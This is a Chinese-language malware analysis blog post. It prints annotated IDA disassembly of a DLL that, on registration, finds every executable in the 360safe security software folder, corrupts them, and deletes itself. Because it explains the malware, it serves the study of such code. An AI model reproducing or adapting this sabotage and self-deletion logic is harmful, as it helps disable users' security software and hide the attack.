MJ0011原創 轉載注明哦!
=================================
注意:此文為技術分析,不帶任何偏向立場
由本文反匯編某廠商的病毒文件或曰惡意競爭文件而導致的任何法律問題,本人一概不負責
=================================
我將文中那個cab文件download了下來 解壓得patch34.dll(內部名稱是patch33.dll,看來升級得太快,程序員連版本信息也沒改就發布了)
使用反匯編工具ida 5.0,發現了一些有意思的東西,現摘錄如下:
我自己加了一些注釋
; Exported entry?? 1. DllRegisterServer
;DLL注冊時要干下面的事
; HRESULT DllRegisterServer(void)
public DllRegisterServer
DllRegisterServer proc near
push??? offset s_360safe ; "
360safe"
;呵呵,這是要干嘛呢?
call??? sub_10001477--->去調用這個子程序
pop???? ecx
push??? hModule???????? ; hModule
call??? sub_10001291
push??? 1
pop???? eax
retn
DllRegisterServer endp
下面來看push了360safe后 sub_10001477這個子程序干嘛去了
; Attributes: bp-based frame
sub_10001477 proc near
FindFileData= _WIN32_FIND_DATAA?ptr -350h
pvData=?dword ptr -210h
FileName= byte ptr -10Ch
pdwType= dword ptr -8
pcbData= dword ptr -4
arg_0= dword ptr? 8
;此處arg_0就是剛才被push的/360safe
push?ebp
mov?ebp, esp
sub?esp, 350h
and?byte ptr [ebp+pvData], 0
push?esi
push?edi
push?40h
pop?ecx
xor?eax, eax
lea?edi, [ebp+pvData+1]
and?[ebp+FileName],?0
rep stosd
stosw
stosb
push?40h
xor?eax, eax
pop?ecx
lea?edi, [ebp-10Bh]
rep stosd
stosw
stosb
lea?eax, [ebp+pcbData]
mov?esi, 103h
push?eax??; pcbData
lea?eax, [ebp+pvData]
push?eax??; pvData
lea?eax, [ebp+pdwType]
push?eax??; pdwType
push?offset pszValue?; "ProgramFilesDir"
;push要取的注冊表鍵值
push?offset pszSubKey ; "'SOFTWAREMicrosoftWindowsCurrentVersion"
;push子鍵值
push?80000002h?; hkey
mov?[ebp+pcbData], esi
mov?[ebp+pdwType], 1
call?ds:SHGetValueA
;獲得SOFTWAREMicrosoftWindowsCurrentVersionProgramFilesDir這個注冊表鍵的內容
;其實也就是系統程序文件夾的位置
push?[ebp+arg_0]
;將獲得的程序文件夾位置+arg_0(360safe)
;得到360safe安裝文件夾地址
lea?eax, [ebp+pvData]
push?eax
push?offset s_SS_exe?; "%s%s*.exe"
lea?eax, [ebp+FileName]
push?esi??; size_t
push?eax??; char *
call?__snprintf
and?[ebp+FindFileData.dwFileAttributes], 0
;查找360安裝目錄下所有*.exe文件
add?esp, 14h
xor?eax, eax
lea?edi, [ebp+FindFileData.ftCreationTime]
push?4Fh
pop?ecx
rep stosd
lea?eax, [ebp+FindFileData]
push?eax??; lpFindFileData
lea?eax, [ebp+FileName]
push?eax??; lpFileName
call?ds:FindFirstFileA
mov?edi, eax
cmp?edi, 0FFFFFFFFh
jz?short loc_10001579
;此處為查找文件的循環判斷
loc_10001531:
lea?eax, [ebp+FindFileData.cFileName]
push?eax
lea?eax, [ebp+pvData]
push?[ebp+arg_0]
push?eax
push?offset s_SSS?; "%s%s%s"
lea?eax, [ebp+FileName]
push?esi??; size_t
push?eax??; char *
call?__snprintf
lea?eax, [ebp+FileName]
push?eax??; char *
call?sub_100013F7
;如果找到了.exe文件,那么開始對其進行破壞
;sub_10013f7這個子程序的作用是破壞給定的EXE文件
;時間關系不列出代碼了
;說一下大概流程
;將push入的文件路徑用r+模式打開,然后自己判斷pe相關信息,最后寫入破壞后的pe結構,導致exe文件無法執行,提示非可執行文件
add?esp, 1Ch
lea?eax, [ebp+FindFileData]
push?eax??; lpFindFileData
push?edi??; hFindFile
call?ds:FindNextFileA
test?eax, eax
jnz?short loc_10001531
test?edi, edi
jz?short loc_10001580
loc_10001579:??; hFindFile
push?edi
call?ds:FindClose
loc_10001580:
pop?edi
pop?esi
leave
retn
sub_10001477 endp
完成對360safe的可執行程序破壞后
開始執行
push??? hModule???????? ; hModule
call??? sub_10001291
在 sub_10001291中
該dll將利用rundll32.exe將自己加載為一個進程執行
并進行自毀,自毀代碼如下:(參數為自己的dll名)
; int __cdecl sub_1000102E(LPCSTR lpExistingFileName,char)
sub_1000102E proc near
lpExistingFileName= dword ptr? 4
arg_4= byte ptr? 8
cmp?[esp+arg_4], 0
jnz?short loc_1000104F
push?[esp+lpExistingFileName] ; lpFileName
call?ds:DeleteFileA
;;首先執行delete file
;;如果失敗則跑到loc_10001047
;;成功則返回
cmp?eax, 1
jnz?short loc_10001047
xor?eax, eax
retn
loc_10001047:
call?ds:GetLastError
jmp?short loc_10001052
loc_1000104F:
push?5
pop?eax
loc_10001052:
cmp?eax, 5
jz?short loc_10001060
cmp?eax, 20h
jz?short loc_10001060
push?1
jmp?short loc_10001079
;;使用win32下強大滴移除文件函數MoveFileExA對自己進行刪除
;;不信自殺不了了我
loc_10001060:
call?sub_10001000
test?eax, eax
jz?short loc_1000107B
push?4??; dwFlags
push?0??; lpNewFileName
push?[esp+8+lpExistingFileName] ; lpExistingFileName
call?ds:MoveFileExA
push?2
loc_10001079:
pop?eax
retn
loc_1000107B:
push?0
push?[esp+4+lpExistingFileName]
call?sub_10001093
;;靠,還刪不掉
;;我把自己寫到wininit.ini里的rename里去,重啟后自動刪除
;;可一定要毀尸滅跡呀!
pop?ecx
pop?ecx
xor?ecx, ecx
test?eax, eax
setnz?cl
inc?ecx
mov?eax, ecx
retn
sub_1000102E endp
綜上,這個dll做的事主要就是干掉360SAFE的所有可執行文件,然后自毀
呵呵,真是殺人不留痕呀
MJ0011原創 轉載注明哦